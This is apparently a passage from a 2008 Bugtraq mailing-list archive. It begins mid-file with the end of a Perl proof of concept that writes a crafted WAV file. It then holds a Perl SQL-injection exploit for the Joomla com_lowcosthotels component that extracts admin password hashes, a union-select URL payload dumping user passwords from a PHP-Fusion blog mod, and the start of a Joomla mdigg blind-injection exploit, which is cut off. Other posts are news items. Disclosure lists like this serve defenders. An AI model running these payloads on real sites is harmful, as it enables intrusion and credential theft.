"\x34\x00\x13\x3c\x4c\x00\x3a\x4c\x01\x37\x4c\x64\x3c\x00\x00\x3a\x00\x00\x37\x00".
"\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x3a\x4c\x01\x37\x4c\x64\x3c\x00\x00\x3a".
"\x00\x00\x37\x00\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x3a\x4c\x01\x37\x4c\x64".
"\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x39\x4c".
"\x65\x3c\x00\x00\x39\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4c\x00\x39\x4c\x65\x3c".
"\x00\x00\x39\x00\x13\x34\x4c\x65\x34\x00\x13\x3c\x4c\x00\x39\x4c\x65\x3c\x00\x00".
"\x39\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4c\x00\x39\x4c\x65\x3c\x00\x00\x39\x00".
"\x13\x37\x4c\x65\x37\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64\x40\x00\x00\x3c".
"\x00\x00\x3a\x00\x13\x30\x4c\x65\x30\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64".
"\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x37\x49\x65\x37\x00\x13\x40\x49\x00\x3c\x49".
"\x01\x3a\x49\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x30\x49\x65\x30\x00\x13\x40".
"\x49\x00\x3c\x49\x01\x3a\x49\x64\x40\x00\x00\x3c\x00\x00\x3a\x00\x13\x35\x49\x65".
"\x35\x00\x13\x41\x49\x00\x3c\x49\x01\x39\x49\x64\x41\x00\x00\x3c\x00\x00\x39\x00".
"\x13\x30\x49\x65\x30\x00\x13\x41\x49\x00\x3c\x49\x01\x39\x49\x64\x41\x00\x00\x3c".
"\x00\x00\x39\x00\x13\x35\x49\x65\x35\x00\x13\x41\x49\x00\x3c\x49\x01\x39\x49\x64".
"\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x4c\x65\x30\x00\x13\x41\x4a\x00\x3c\x4a".
"\x01\x39\x4a\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x34\x49\x65\x34\x00\x13\x3c".
"\x49\x00\x3a\x49\x01\x37\x49\x64\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x30\x49\x65".
"\x30\x00\x13\x3c\x47\x00\x3a\x47\x01\x37\x47\x64\x3c\x00\x00\x3a\x00\x00\x37\x00".
"\x13\x34\x46\x65\x34\x00\x13\x3c\x43\x00\x3a\x43\x01\x37\x43\x64\x3c\x00\x00\x3a".
"\x00\x00\x37\x00\x13\x30\x40\x65\x30\x00\x13\x3c\x3a\x00\x3a\x3a\x01\x37\x3a\x64".
"\x3c\x00\x00\x3a\x00\x00\x37\x00\x13\x32\x37\x65\x32\x00\x13\x3c\x37\x00\x39\x37".
"\x65\x3c\x00\x00\x39\x00\x13\x30\x34\x65\x30\x00\x13\x3c\x34\x00\x39\x34\x65\x3c".
"\x00\x00\x39\x00\x13\x32\x3a\x65\x32\x00\x13\x3c\x3d\x00\x39\x3d\x65\x3c\x00\x00".
"\x39\x00\x13\x30\x3f\x65\x30\x00\x13\x3c\x3f\x00\x39\x3f\x65\x3c\x00\x00\x39\x00".
"\x13\x31\x4e\x65\x31\x00\x13\x3b\x4e\x00\x38\x4e\x01\x35\x4e\x64\x3b\x00\x00\x38".
"\x00\x00\x35\x00\x13\x31\x4c\x65\x31\x00\x13\x3b\x4c\x00\x38\x4c\x01\x35\x4c\x64".
"\x3b\x00\x00\x38\x00\x00\x35\x00\x13\x30\x4c\x65\x30\x00\x13\x3c\x4c\x00\x39\x4c".
"\x01\x35\x4c\x64\x3c\x00\x00\x39\x00\x00\x35\x00\x13\x30\x4c\x65\x30\x00\x13\x40".
"\x4c\x00\x3c\x4c\x01\x39\x4c\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x4c\x65".
"\x30\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64\x40\x00\x00\x3c\x00\x00\x3a\x00".
"\x13\x30\x4c\x65\x30\x00\x13\x40\x4c\x00\x3c\x4c\x01\x3a\x4c\x64\x40\x00\x00\x3c".
"\x00\x00\x3a\x00\x13\x40\x49\x00\x3c\x49\x00\x39\x49\x00\x35\x49\x65\x40\x00\x00".
"\x3c\x00\x00\x39\x00\x00\x35\x00\x81\x0c\x35\x3a\x00\x29\x3a\x64\x35\x00\x00\x29".
"\x00\x13\x36\x37\x00\x2a\x37\x65\x36\x00\x00\x2a\x00\x13\x37\x34\x00\x2b\x34\x65".
"\x37\x00\x00\x2b\x00\x13\x39\x34\x00\x2d\x34\x81\x21\x39\x00\x00\x2d\x00\x13\x37".
"\x37\x00\x2b\x37\x29\x37\x00\x00\x2b\x00\x13\x36\x37\x00\x2a\x37\x29\x36\x00\x00".
"\x2a\x00\x13\x37\x37\x00\x2b\x37\x29\x37\x00\x00\x2b\x00\x13\x3c\x37\x00\x30\x37".
"\x65\x3c\x00\x00\x30\x00\x13\x3e\x3a\x00\x32\x3a\x81\x21\x3e\x00\x00\x32\x00\x13".
"\x3c\x3d\x00\x30\x3d\x29\x3c\x00\x00\x30\x00\x13\x3b\x40\x00\x2f\x40\x29\x3b\x00".
"\x00\x2f\x00\x13\x3c\x40\x00\x30\x40\x29\x3c\x00\x00\x30\x00\x13\x41\x46\x00\x3b".
"\x46\x01\x37\x46\x81\x5c\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x41\x57\x00\x3b\x57".
"\x00\x37\x57\x81\x5d\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x40\x4e\x00\x3c\x4e\x65".
"\x40\x00\x00\x3c\x00\x81\x0c\x30\x49\x00\x24\x49\x64\x30\x00\x00\x24\x00\x81\x0c".
"\x29\x51\x64\x29\x00\x13\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40\x00\x00\x3c\x00".
"\x00\x39\x00\x13\x29\x51\x65\x29\x00\x13\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40".
"\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01".
"\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51".
"\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x51\x65\x2b".
"\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13".
"\x2f\x51\x65\x2f\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00".
"\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40".
"\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01".
"\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x29\x51\x65\x29\x00\x13\x41\x51".
"\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x51\x65\x2d".
"\x00\x13\x41\x51\x00\x3c\x51\x01\x39\x51\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13".
"\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00".
"\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40".
"\x00\x00\x3c\x00\x00\x37\x00\x13\x39\x51\x00\x2d\x51\x65\x39\x00\x00\x2d\x00\x13".
"\x40\x51\x00\x3c\x51\x01\x39\x51\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x53".
"\x00\x29\x53\x65\x35\x00\x00\x29\x00\x13\x35\x54\x00\x29\x54\x65\x35\x00\x00\x29".
"\x00\x13\x34\x57\x00\x28\x57\x65\x34\x00\x00\x28\x00\x81\x0c\x3c\x5d\x00\x30\x5d".
"\x81\x5c\x3c\x00\x00\x30\x00\x13\x29\x5d\x65\x29\x00\x13\x40\x57\x00\x3c\x57\x01".
"\x39\x57\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x40\x54".
"\x00\x3c\x54\x01\x39\x54\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30".
"\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13".
"\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00".
"\x00\x37\x00\x13\x2b\x51\x65\x2b\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41".
"\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x51\x65\x2f\x00\x13\x41\x51\x00\x3b\x51\x01".
"\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51".
"\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34".
"\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13".
"\x35\x51\x65\x35\x00\x13\x3e\x51\x00\x3c\x51\x01\x39\x51\x64\x3e\x00\x00\x3c\x00".
"\x00\x39\x00\x13\x36\x51\x65\x36\x00\x13\x3e\x51\x00\x3d\x51\x01\x39\x51\x64\x3e".
"\x00\x00\x3d\x00\x00\x39\x00\x13\x37\x51\x65\x37\x00\x13\x40\x4e\x00\x3c\x4e\x65".
"\x40\x00\x00\x3c\x00\x13\x34\x4e\x65\x34\x00\x13\x40\x4e\x00\x3c\x4e\x01\x37\x4e".
"\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x3e\x51\x00\x37".
"\x51\x65\x3e\x00\x00\x37\x00\x13\x37\x51\x00\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00".
"\x13\x30\x51\x00\x24\x51\x65\x30\x00\x00\x24\x00\x82\x7c\x29\x51\x64\x29\x00\x13".
"\x40\x52\x00\x3c\x52\x01\x39\x52\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x29\x54".
"\x65\x29\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54\x64\x40\x00\x00\x3c\x00\x00\x39".
"\x00\x13\x30\x54\x65\x30\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00".
"\x3c\x00\x00\x37\x00\x13\x34\x54\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54".
"\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x54\x65\x2b\x00\x13\x41\x54\x00\x3b".
"\x54\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x2f\x54\x65\x2f\x00\x13".
"\x41\x54\x00\x3b\x54\x01\x37\x54\x64\x41\x00\x00\x3b\x00\x00\x37\x00\x13\x30\x54".
"\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00\x3c\x00\x00\x37".
"\x00\x13\x30\x57\x65\x30\x00\x13\x40\x57\x00\x3c\x57\x01\x37\x57\x64\x40\x00\x00".
"\x3c\x00\x00\x37\x00\x13\x29\x57\x65\x29\x00\x13\x41\x57\x00\x3c\x57\x01\x39\x57".
"\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x2d\x57\x65\x2d\x00\x13\x41\x57\x00\x3c".
"\x57\x01\x39\x57\x64\x41\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13".
"\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x54".
"\x65\x34\x00\x13\x40\x54\x00\x3c\x54\x01\x37\x54\x64\x40\x00\x00\x3c\x00\x00\x37".
"\x00\x13\x39\x54\x00\x2d\x54\x65\x39\x00\x00\x2d\x00\x13\x40\x54\x00\x3c\x54\x01".
"\x39\x54\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x35\x55\x00\x29\x55\x65\x35\x00".
"\x00\x29\x00\x13\x35\x54\x00\x29\x54\x65\x35\x00\x00\x29\x00\x13\x34\x54\x00\x28".
"\x54\x65\x34\x00\x00\x28\x00\x81\x0c\x3c\x54\x00\x30\x54\x81\x5c\x3c\x00\x00\x30".
"\x00\x13\x29\x54\x65\x29\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54\x64\x40\x00\x00".
"\x3c\x00\x00\x39\x00\x13\x2d\x54\x65\x2d\x00\x13\x40\x54\x00\x3c\x54\x01\x39\x54".
"\x64\x40\x00\x00\x3c\x00\x00\x39\x00\x13\x30\x54\x65\x30\x00\x13\x40\x52\x00\x3c".
"\x52\x01\x37\x52\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13".
"\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x2b\x51".
"\x65\x2b\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00\x3b\x00\x00\x37".
"\x00\x13\x2f\x51\x65\x2f\x00\x13\x41\x51\x00\x3b\x51\x01\x37\x51\x64\x41\x00\x00".
"\x3b\x00\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51".
"\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c".
"\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00\x00\x37\x00\x13\x35\x51\x65\x35\x00\x13".
"\x3e\x51\x00\x3c\x51\x01\x39\x51\x64\x3e\x00\x00\x3c\x00\x00\x39\x00\x13\x36\x51".
"\x65\x36\x00\x13\x3e\x51\x00\x3d\x51\x01\x39\x51\x64\x3e\x00\x00\x3d\x00\x00\x39".
"\x00\x13\x37\x51\x65\x37\x00\x13\x40\x51\x00\x3c\x51\x65\x40\x00\x00\x3c\x00\x13".
"\x34\x51\x65\x34\x00\x13\x40\x51\x00\x3c\x51\x01\x37\x51\x64\x40\x00\x00\x3c\x00".
"\x00\x37\x00\x13\x30\x51\x65\x30\x00\x13\x3e\x51\x00\x37\x51\x65\x3e\x00\x00\x37".
"\x00\x13\x37\x51\x00\x2b\x51\x81\x5d\x37\x00\x00\x2b\x00\x13\x30\x4f\x00\x24\x4f".
"\x65\x30\x00\x00\x24\x00\x81\x0c\x30\x51\x00\x24\x51\x64\x30\x00\x00\x24\x00\x81".
"\x0c\xff\x2f\x00\x00";
open(out, "> int-ov.wav");
binmode(out);
print (out $wav);
close(out);


-----------|
           |
4)Credits  |
           |
-----------|

laurent gaffi

laurent.gaffie{remove_this}[at]gmail[dot]com

From - Thu Dec 25 13:50:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054eb
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39028-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 460B6ECD89
for <lists@securityspace.com>; Thu, 25 Dec 2008 13:47:36 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 7772F236FCD; Thu, 25 Dec 2008 11:22:53 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7376 invoked from network); 25 Dec 2008 09:58:01 -0000
Date: Thu, 25 Dec 2008 03:03:19 -0700
Message-Id: <200812251003.mBPA3JJg017700@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: Already-sended-information-to-security-focus@mailinator.com
To: bugtraq@securityfocus.com
Subject: Re: Google Chrome Browser (ChromeHTML://) remote parameter
 injection POC
Status:   

This won't work since google chrome will ask for user permission. btw, it cannot launch the applet even you have given out the permission.

From - Thu Dec 25 14:00:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054ec
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39029-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8BFC5ECD81
for <lists@securityspace.com>; Thu, 25 Dec 2008 13:54:56 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4E6D5236FBB; Thu, 25 Dec 2008 11:23:34 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 8711 invoked from network); 25 Dec 2008 11:40:37 -0000
Date: Thu, 25 Dec 2008 04:44:32 -0700
Message-Id: <200812251144.mBPBiWhc022255@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: lovebug@hotmail.it
To: bugtraq@securityfocus.com
Subject: joomla com_lowcosthotels sql injection
Status:   

This can be exploited to manipulate SQL queries by injecting arbitrary SQL code .

exploit --



#!/usr/bin/perl 
#Joomla com_lowcosthotels Sql injection#
########################################
#[] Author :  Lovebug
#[] www.rbt-4.net
#[] Module_Name:  com_lowcosthotels
#[] Script_Name:  Joomla
########################################
 
use LWP::UserAgent;
 
print "\n Target :   http://wwww.site.com/path/   : ";
 chomp(my $target=<STDIN>);
 
$cn="concat(username,0x3a,password)";
$table_name="jos_users";
 
$br = LWP::UserAgent->new() or die "Could not initialize browser\n";
$br->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
 
$host = $target .   "/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+union+select+1,".$cn."+from/**/".$table_name."--";
$res = $br->request(HTTP::Request->new(GET=>$host));$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
  print "\n[+] Admin Hash : $1\n\n";
  
}
else{print "\n[-] Exploit failed.\n";
}

From - Thu Dec 25 14:10:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054ed
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39030-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 026FCECD8B
for <lists@securityspace.com>; Thu, 25 Dec 2008 14:04:56 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 9C588236FDB; Thu, 25 Dec 2008 11:23:50 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9284 invoked from network); 25 Dec 2008 12:16:44 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=secnap.net; h content-transfer-encoding:content-type:mime-version:message-id
:from:subject:date:user-agent; s=dkim; t30208612; x 1232023012; bh=y6ZNgnIh0Msomqh0G0Eg0q2VXIss73EePvJMQspFjxs=; b=p
Q7X/fZYcIuSJzpdkz+HP8EF8F8noxzHuM8Ubu0ljljT+wCn9i00wwuTvd3ZqBPYO
mn2/zv5vWU73Zwjt375e9bLqNqei3Y2qBsvzpjO9vfv5/Q9/B++z9wajsi2cEv+r
BzGIaXDKuqNzCmE102gZsvxGUwXf6Aq4ztFD95YJ4AX-Amavis-Modified: Mail body modified (using disclaimer) -
fl.us.spammertrap.net
X-Virus-Scanned: SpammerTrap(r) SME-150 1.90 at fl.us.spammertrap.net
User-Agent: Microsoft-Entourage/12.15.0.081119
Date: Thu, 25 Dec 2008 07:35:59 -0500
Subject: Castlecops security site closed for good
From: Michael Scheidell <scheidell@secnap.net>
To: <bugtraq@securityfocus.com>
Cc: SA Mailing list <users@spamassassin.apache.org>,
<first-alerts@listserver.hackertrap.net>
Message-ID: <C578E85F.78E9D%scheidell@secnap.net>
Thread-Topic: Castlecops security site closed for good
Thread-Index: AclmjVbV5xrA8siqMkumBcNGQOXsrw=Mime-version: 1.0
Content-type: text/plain;
charset="US-ASCII"
Content-transfer-encoding: 7bit
Status:   

Despite having survived ODOS attacks last year, and paypal phishing attacks,
it looks like security site CastleCops has closed for good.  We wish them
well, if they are frequent visitors to bugtraq and are sorry to see them go.
Their assistance in investigating and tracking phishers, and their volunteer
work was always appreciated by users and system administrators.

Some of their data has moved already to:
http://www.systemlookup.com/


>From their web site:
"Greetings Folks,

You have arrived at the CastleCops website, which is currently offline. It
has been our pleasure to investigate online crime and volunteer with our
virtual family to assist with your computer needs and make the Internet a
safer place. Unfortunately, all things come to an end. Keep up the good
fight folks, for the spirit of this community lies within each of us. We are
empowered to improve the safety and security of the Internet in our own way.
Let us feel blessed for the impact we made and the relationships created."



-- 
Michael Scheidell, CTO
>|SECNAP Network Security
Winner 2008 Network Products Guide Hot Companies
FreeBSD SpamAssassin Ports maintainer


_________________________________________________________________________
This email has been scanned and certified safe by SpammerTrap(r). 
For Information please see http://www.secnap.com/products/spammertrap/
_________________________________________________________________________

From - Thu Dec 25 14:20:35 2008
X-Account-Key: account7
X-UIDL: 4909bb8c000054ee
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39031-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 87F7CECD8B
for <lists@securityspace.com>; Thu, 25 Dec 2008 14:14:02 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 78D05237038; Thu, 25 Dec 2008 11:24:19 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11196 invoked from network); 25 Dec 2008 14:51:52 -0000
Date: 25 Dec 2008 15:12:04 -0000
Message-ID: <20081225151204.28221.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: r3d.w0rm@yahoo.com
To: bugtraq@securityfocus.com
Subject: PHP-Fusion Mod TI - Blog System Sql Injection
Status:   

#####################################################################################
####               PHP-Fusion Mod TI - Blog System Sql Injection                ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
#                                                                                   #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id7
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

From - Mon Dec 29 12:50:37 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005512
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39033-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 7A270EC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 12:41:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 92EAC143791; Mon, 29 Dec 2008 10:37:51 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 29006 invoked from network); 26 Dec 2008 06:26:31 -0000
Message-ID: <3937f01b0812252246s11d9957ci54322c918f81f176@mail.gmail.com>
Date: Fri, 26 Dec 2008 12:16:47 +0530
From: ClubHack <seclist@clubhack.com>
To: bugtraq@securityfocus.com
Subject: ClubHack2008 presentations are now online
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Status:   

ClubHack2008 presentations are online.
Apologies for delay in videos, they will follow soon :)


http://clubhack.com/2008/Presentations


thanks
team ClubHack

-- 
This is a non-monitored alias, please do not reply directly.
Please send your mails to info@clubhack.com

From - Mon Dec 29 12:50:38 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005513
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39034-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 04499EC0B4
for <lists@securityspace.com>; Mon, 29 Dec 2008 12:47:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 83873143795; Mon, 29 Dec 2008 10:42:11 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 7806 invoked from network); 26 Dec 2008 19:35:11 -0000
Date: Fri, 26 Dec 2008 12:40:33 -0700
Message-Id: <200812261940.mBQJeX0B020727@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: hadihadi_zedehal_2006@yahoo.com
To: bugtraq@securityfocus.com
Subject: Joomla Component mdigg 2.2.8 Blind SQL Injection Exploit
Status:   

#!/usr/bin/perl 
####################################################################################
# Joomla Component mdigg 2.2.8 Blind SQL Injection Exploit                         #
#                           ..::virangar security team::..                         #
#                              www.virangar.net                                    #
#C0d3d BY:virangar security team ( hadihadi  )                                     #
#special tnx to:                                                                   #
#MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra                                    #
#& all virangar members & all hackerz                                              #
# my lovely friends hadi_aryaie2004 & arash(imm02tal)                              #
#             ..:::Young Iranian Hackerz::..                                       #
####################################################################################


use HTTP::Request;
